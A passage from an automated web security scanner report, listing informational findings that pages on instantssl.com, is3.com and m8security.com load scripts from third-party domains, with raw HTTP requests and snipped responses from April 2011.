Host:   https://www.instantssl.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.instantssl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 12:49:54 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 30428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>SSL Certificate F
...[SNIP]...
<link href="/css/mast_head.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="//secure.comodo.com/hostedLogin/sha1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.comodo.com/hostedLogin/login.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//google-analytics.com/urchin.js"></script>
...[SNIP]...
<div id="index-news"><script type="text/javascript" src="https://forums.comodo.com/rss.php?i=1&t=1&l=1&n=1&d=1&w=1&url=http://www.comodo.com/rss.xml"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.comodo.com/prices.js"></script>
...[SNIP]...
<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script type="text/javascript" src='//server.iad.liveperson.net/hc/61298727/x.js?cmd=file&file=chatScript3&site=61298727&&imageUrl=http://www.instantssl.com/ssl-certificate-images/liveperson/sales'> </script>
...[SNIP]...

21.54. https://www.instantssl.com/ssl-certificate-products/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.instantssl.com
Path:   /ssl-certificate-products/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ssl-certificate-products/ HTTP/1.1
Host: www.instantssl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 12:49:55 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 37063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--START GWO HEADER -->
<!--GW
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/ssl-certificate-css/productlist.css" media="all" />

<script type="text/javascript" src="//secure.comodo.com/hostedLogin/sha1.js"></script>
<script type="text/javascript" src="//secure.comodo.com/hostedLogin/login.js"></script>
...[SNIP]...
<!--google-->
<script type="text/javascript" src="//google-analytics.com/urchin.js"></script>
...[SNIP]...
<!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script type="text/javascript" src='https://server.iad.liveperson.net/hc/61298727/x.js?cmd=file&file=chatScript3&site=61298727&&imageUrl=http://www.instantssl.com/ssl-certificate-images/liveperson/sales'> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.comodo.com/prices.js"></script>
...[SNIP]...

21.55. http://www.is3.com/about/af-support-form.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /about/af-support-form.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/af-support-form.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uz5dkgqlh1h3rh45ub1bxp2u; VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; __utmz=252437649.1303826349.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=252437649.419534079.1303826349.1303826349.1303826349.1; __utmc=252437649; __utmb=252437649.5.10.1303826349

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:59:16 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:59:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 37735


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
</script><script type="text/javascript" language="JavaScript1.2" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.query.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.cookie.js"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\script\google_analytics\is3.xslt -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\chat\monitor\default.xslt -->
<script type="text/javascript" language="JavaScript1.2" src="https://download.stopzilla.com/images/is3/site/scripts/boldchat/boldchat.js"></script>
...[SNIP]...

21.56. http://www.is3.com/about/contactUs.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /about/contactUs.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/contactUs.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:58:56 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:58:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vvivob45vz2sv1nc3pbgld55; path=/; HttpOnly
Set-Cookie: VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; domain=.is3.com; expires=Wed, 25-Apr-2012 13:58:56 GMT; path=/
Vary: Accept-Encoding
Content-Length: 22842


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
</script><script type="text/javascript" language="JavaScript1.2" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.query.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.cookie.js"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\script\google_analytics\is3.xslt -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\chat\monitor\default.xslt -->
<script type="text/javascript" language="JavaScript1.2" src="https://download.stopzilla.com/images/is3/site/scripts/boldchat/boldchat.js"></script>
...[SNIP]...

21.57. http://www.is3.com/products/antifraud/Affiliates.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /products/antifraud/Affiliates.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/antifraud/Affiliates.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uz5dkgqlh1h3rh45ub1bxp2u; VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; __utmz=252437649.1303826349.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=252437649.419534079.1303826349.1303826349.1303826349.1; __utmc=252437649; __utmb=252437649.6.10.1303826349

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:59:20 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:59:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 20300


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
</script><script type="text/javascript" language="JavaScript1.2" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.query.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.cookie.js"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\script\google_analytics\is3.xslt -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\chat\monitor\default.xslt -->
<script type="text/javascript" language="JavaScript1.2" src="https://download.stopzilla.com/images/is3/site/scripts/boldchat/boldchat.js"></script>
...[SNIP]...

21.58. http://www.is3.com/products/antifraud/BizDev.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /products/antifraud/BizDev.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/antifraud/BizDev.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uz5dkgqlh1h3rh45ub1bxp2u; VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; __utmz=252437649.1303826349.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=252437649.419534079.1303826349.1303826349.1303826349.1; __utmc=252437649; __utmb=252437649.8.10.1303826349

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:59:22 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:59:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 39848


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
</script><script type="text/javascript" language="JavaScript1.2" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.query.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.cookie.js"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\script\google_analytics\is3.xslt -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\chat\monitor\default.xslt -->
<script type="text/javascript" language="JavaScript1.2" src="https://download.stopzilla.com/images/is3/site/scripts/boldchat/boldchat.js"></script>
...[SNIP]...

21.59. http://www.is3.com/products/antifraud/Bulk-Licensing.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /products/antifraud/Bulk-Licensing.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/antifraud/Bulk-Licensing.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uz5dkgqlh1h3rh45ub1bxp2u; VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; __utmz=252437649.1303826349.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=252437649.419534079.1303826349.1303826349.1303826349.1; __utmc=252437649; __utmb=252437649.7.10.1303826349

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:59:21 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:59:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 18629


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
</script><script type="text/javascript" language="JavaScript1.2" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.query.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.cookie.js"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\script\google_analytics\is3.xslt -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\chat\monitor\default.xslt -->
<script type="text/javascript" language="JavaScript1.2" src="https://download.stopzilla.com/images/is3/site/scripts/boldchat/boldchat.js"></script>
...[SNIP]...

21.60. http://www.is3.com/products/antifraud/Reseller.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /products/antifraud/Reseller.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/antifraud/Reseller.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uz5dkgqlh1h3rh45ub1bxp2u; VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; __utmz=252437649.1303826349.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=252437649.419534079.1303826349.1303826349.1303826349.1; __utmc=252437649; __utmb=252437649.6.10.1303826349

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:59:20 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:59:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 57957


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
</script><script type="text/javascript" language="JavaScript1.2" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.query.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.cookie.js"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\script\google_analytics\is3.xslt -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\chat\monitor\default.xslt -->
<script type="text/javascript" language="JavaScript1.2" src="https://download.stopzilla.com/images/is3/site/scripts/boldchat/boldchat.js"></script>
...[SNIP]...

21.61. http://www.is3.com/products/antifraud/home.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /products/antifraud/home.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/antifraud/home.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
Referer: http://www.stopzilla.com/products/home.do
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uz5dkgqlh1h3rh45ub1bxp2u; VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; __utmz=252437649.1303826349.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=252437649.419534079.1303826349.1303826349.1303826349.1; __utmc=252437649; __utmb=252437649.1.10.1303826349

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:59:06 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:59:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 21242


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
</script><script type="text/javascript" language="JavaScript1.2" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.query.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.cookie.js"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\script\google_analytics\is3.xslt -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\chat\monitor\default.xslt -->
<script type="text/javascript" language="JavaScript1.2" src="https://download.stopzilla.com/images/is3/site/scripts/boldchat/boldchat.js"></script>
...[SNIP]...

21.62. http://www.is3.com/support/antifraud/home.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /support/antifraud/home.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/antifraud/home.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uz5dkgqlh1h3rh45ub1bxp2u; VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; __utmz=252437649.1303826349.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=252437649.419534079.1303826349.1303826349.1303826349.1; __utmc=252437649; __utmb=252437649.2.10.1303826349

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:59:13 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:59:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 19271


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
</script><script type="text/javascript" language="JavaScript1.2" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.query.js"></script><script type="text/javascript" src="http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.cookie.js"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\script\google_analytics\is3.xslt -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<!-- BEGIN RESOURCE: is3_site\content\chat\monitor\default.xslt -->
<script type="text/javascript" language="JavaScript1.2" src="https://download.stopzilla.com/images/is3/site/scripts/boldchat/boldchat.js"></script>
...[SNIP]...

21.63. http://www.m8security.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.m8security.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.m8security.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:45:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESSa3ee040a33364f343ddaa1d4cf0e6bab=2q12tlg89jgpaked26837s8347; expires=Thu, 19 May 2011 03:18:39 GMT; path=/; domain=.m8security.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 23:45:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.m8security.com/blogapi/rsd" />
<script src="https://m8security.foxycart.com/files/foxycart_includes.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

21.64. http://www.m8security.com/m8secure-signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.m8security.com
Path:   /m8secure-signup

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /m8secure-signup HTTP/1.1
Host: www.m8security.com
Proxy-Connection: keep-alive
Referer: http://www.m8security.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSa3ee040a33364f343ddaa1d4cf0e6bab=rkkad07r1l9i10e6ctbbij8o53; has_js=1; wooTracker=W8G4KA0ETWQQ018G903G6MISMSPK2V6M; __utmz=111099353.1303775087.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=111099353.1919971600.1303775087.1303775087.1303775087.1; __utmc=111099353; __utmb=111099353.1.10.1303775087; wooMeta=MjEyJjEmMSYyNDE5MTImMTMwMzc3NTA3NzA2NiYxMzAzNzc1MzE4OTYyJiYxMDAmJjUwMDExNSYmJiY=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:01:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 00:01:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script src="https://m8security.foxycart.com/files/foxycart_includes.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

21.65. http://www.m8security.com/managed-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.m8security.com
Path:   /managed-security

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /managed-security HTTP/1.1
Host: www.m8security.com
Proxy-Connection: keep-alive
Referer: http://www.m8security.com/m8secure-signup
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSa3ee040a33364f343ddaa1d4cf0e6bab=rkkad07r1l9i10e6ctbbij8o53; wooTracker=W8G4KA0ETWQQ018G903G6MISMSPK2V6M; __utmz=111099353.1303775087.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=111099353.1919971600.1303775087.1303775087.1303775087.1; __utmc=111099353; __utmb=111099353.2.10.1303775087; wooMeta=MjEyJjImMSYyNDE5MTMmMTMwMzc3NTA3NzA2NiYxMzAzNzc2MDczNTg2JiYxMDAmJjUwMDExNSYmJiY=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:02:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 00:02:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
